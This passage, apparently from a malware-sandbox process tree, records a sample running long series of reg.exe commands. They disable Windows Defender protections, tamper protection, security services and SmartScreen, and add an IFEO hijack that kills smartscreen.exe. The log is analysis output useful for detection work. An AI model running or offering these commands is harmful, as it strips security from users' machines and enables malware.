                                                                                  C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "FilesBlockedNotificationDisabled" /t REG_DWORD /d "00000001" /f /reg:64
                                                                                  8⤵
                                                                                    PID:3024
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "SummaryNotificationDisabled" /t REG_DWORD /d "00000001" /f /reg:64
                                                                                    8⤵
                                                                                      PID:2240
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRawWriteNotification /t REG_DWORD /d "1" /f /reg:64
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:1748
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d "1" /f /reg:64
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:2092
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d "1" /f
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:1860
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f /reg:64
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:1904
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:1188
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d "1" /f /reg:64
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:1940
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d "1" /f
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:1576
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d "1" /f /reg:64
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:1740
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIntrusionPreventionSystem /t REG_DWORD /d "0" /f /reg:64
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:1884
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableInformationProtectionControl /t REG_DWORD /d "0" /f /reg:64
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:2496
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d "1" /f /reg:64
                                                                                      8⤵
                                                                                        PID:2996
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t reg_DWORD /d "1" /f /reg:64
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        PID:1908
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t reg_DWORD /d "1" /f
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        PID:2076
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d "0" /f /reg:64
                                                                                        8⤵
                                                                                          PID:2088
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d "0" /f
                                                                                          8⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2540
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d "2" /f /reg:64
                                                                                          8⤵
                                                                                            PID:2104
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d "2" /f
                                                                                            8⤵
                                                                                              PID:2060
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d "0" /f /reg:64
                                                                                              8⤵
                                                                                                PID:2396
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d "0" /f /reg:64
                                                                                                8⤵
                                                                                                  PID:1376
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d "1" /f /reg:64
                                                                                                  8⤵
                                                                                                    PID:2056
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d "1" /f
                                                                                                    8⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:1864
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d "8" /f /reg:64
                                                                                                    8⤵
                                                                                                      PID:2504
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t reg_DWORD /d "1" /f /reg:64
                                                                                                      8⤵
                                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                                      PID:1584
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t reg_DWORD /d "1" /f
                                                                                                      8⤵
                                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                                      PID:2704
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f /reg:64
                                                                                                      8⤵
                                                                                                        PID:2100
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                        8⤵
                                                                                                          PID:2096
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f /reg:64
                                                                                                          8⤵
                                                                                                            PID:2380
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
                                                                                                            8⤵
                                                                                                              PID:2008
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f /reg:64
                                                                                                              8⤵
                                                                                                                PID:1976
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
                                                                                                                8⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:2376
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                8⤵
                                                                                                                  PID:2680
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                                  8⤵
                                                                                                                    PID:2796
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d "1" /f /reg:64
                                                                                                                    8⤵
                                                                                                                    • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                    PID:2860
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    C:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t "REG_DWORD" /d "0" /f /reg:64
                                                                                                                    8⤵
                                                                                                                      PID:3004
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      C:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t "REG_DWORD" /d "0" /f
                                                                                                                      8⤵
                                                                                                                      • Modifies Windows Defender TamperProtection settings
                                                                                                                      PID:2700
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v DisableAntiSpyware /t REG_DWORD /d "4" /f /reg:64
                                                                                                                      8⤵
                                                                                                                      • Modifies security service
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:2604
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d "4" /f /reg:64
                                                                                                                      8⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:2720
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d "4" /f /reg:64
                                                                                                                      8⤵
                                                                                                                      • Modifies Security services
                                                                                                                      PID:2748
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\MsSecFlt" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                      8⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:2856
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                      8⤵
                                                                                                                      • Modifies Security services
                                                                                                                      PID:2752
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                      8⤵
                                                                                                                        PID:980
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                        8⤵
                                                                                                                          PID:332
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                          8⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:2888
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                          8⤵
                                                                                                                          • Modifies Security services
                                                                                                                          PID:2880
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                          8⤵
                                                                                                                          • Modifies Security services
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:2744
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                          8⤵
                                                                                                                          • Modifies Security services
                                                                                                                          PID:2780
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                          8⤵
                                                                                                                          • Modifies Security services
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:2760
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                          8⤵
                                                                                                                          • Modifies Security services
                                                                                                                          PID:2904
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                          8⤵
                                                                                                                          • Modifies Security services
                                                                                                                          PID:2988
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                          8⤵
                                                                                                                          • Modifies Security services
                                                                                                                          PID:2332
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                          8⤵
                                                                                                                          • Modifies Security services
                                                                                                                          PID:2608
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                          8⤵
                                                                                                                          • Modifies Security services
                                                                                                                          PID:2908
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                          8⤵
                                                                                                                          • Modifies Security services
                                                                                                                          PID:2732
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                          8⤵
                                                                                                                          • Modifies Security services
                                                                                                                          PID:2644
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                          8⤵
                                                                                                                          • Modifies Security services
                                                                                                                          PID:2612
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                          8⤵
                                                                                                                          • Modifies security service
                                                                                                                          PID:2476
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmAgent" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                          8⤵
                                                                                                                            PID:2464
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                            8⤵
                                                                                                                              PID:3000
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                              8⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:2592
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefsvc" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                              8⤵
                                                                                                                                PID:2848
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefusersvc" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                8⤵
                                                                                                                                  PID:2616
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v DisableAntiSpyware /t REG_DWORD /d "4" /f
                                                                                                                                  8⤵
                                                                                                                                  • Modifies security service
                                                                                                                                  PID:2652
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d "4" /f
                                                                                                                                  8⤵
                                                                                                                                    PID:2480
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d "4" /f
                                                                                                                                    8⤵
                                                                                                                                    • Modifies Security services
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:2672
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\MsSecFlt" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    8⤵
                                                                                                                                      PID:2284
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                      8⤵
                                                                                                                                      • Modifies Security services
                                                                                                                                      PID:2452
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                      8⤵
                                                                                                                                        PID:584
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                        8⤵
                                                                                                                                        • Modifies Security services
                                                                                                                                        PID:1848
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                        8⤵
                                                                                                                                        • Modifies Security services
                                                                                                                                        PID:2412
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                        8⤵
                                                                                                                                        • Modifies Security services
                                                                                                                                        PID:1692
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                        8⤵
                                                                                                                                        • Modifies Security services
                                                                                                                                        PID:2660
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                        8⤵
                                                                                                                                        • Modifies security service
                                                                                                                                        PID:2132
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmAgent" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                        8⤵
                                                                                                                                          PID:1708
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                          8⤵
                                                                                                                                            PID:2872
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            8⤵
                                                                                                                                              PID:1208
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefsvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                              8⤵
                                                                                                                                                PID:1316
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefusersvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                8⤵
                                                                                                                                                  PID:300
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\ControlSet001\Services" /s /k "webthreatdefusersvc" /f 2>nul | find /i "webthreatdefusersvc"
                                                                                                                                                  8⤵
                                                                                                                                                    PID:2172
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      reg query "HKLM\SYSTEM\ControlSet001\Services" /s /k "webthreatdefusersvc" /f
                                                                                                                                                      9⤵
                                                                                                                                                        PID:2584
                                                                                                                                                      • C:\Windows\SysWOW64\find.exe
                                                                                                                                                        find /i "webthreatdefusersvc"
                                                                                                                                                        9⤵
                                                                                                                                                          PID:1720
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                        8⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:2028
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe" /v "Debugger" /t REG_SZ /d "%windir%\System32\taskkill.exe" /f /reg:64
                                                                                                                                                        8⤵
                                                                                                                                                        • Event Triggered Execution: Image File Execution Options Injection
                                                                                                                                                        PID:2164
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "6152" /f /reg:64
                                                                                                                                                        8⤵
                                                                                                                                                          PID:1680
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f /reg:64
                                                                                                                                                          8⤵
                                                                                                                                                            PID:1920
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;" /f /reg:64
                                                                                                                                                            8⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:772
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "ModRiskFileTypes" /t REG_SZ /d ".bat;.exe;.reg;.vbs;.chm;.msi;.js;.cmd" /f /reg:64
                                                                                                                                                            8⤵
                                                                                                                                                              PID:2044
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                              8⤵
                                                                                                                                                                PID:1452
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d "0" /f
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:1736
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:1972
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d "0" /f
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:1568
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f /reg:64
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:1252
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:2144
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:2696
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:2004
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
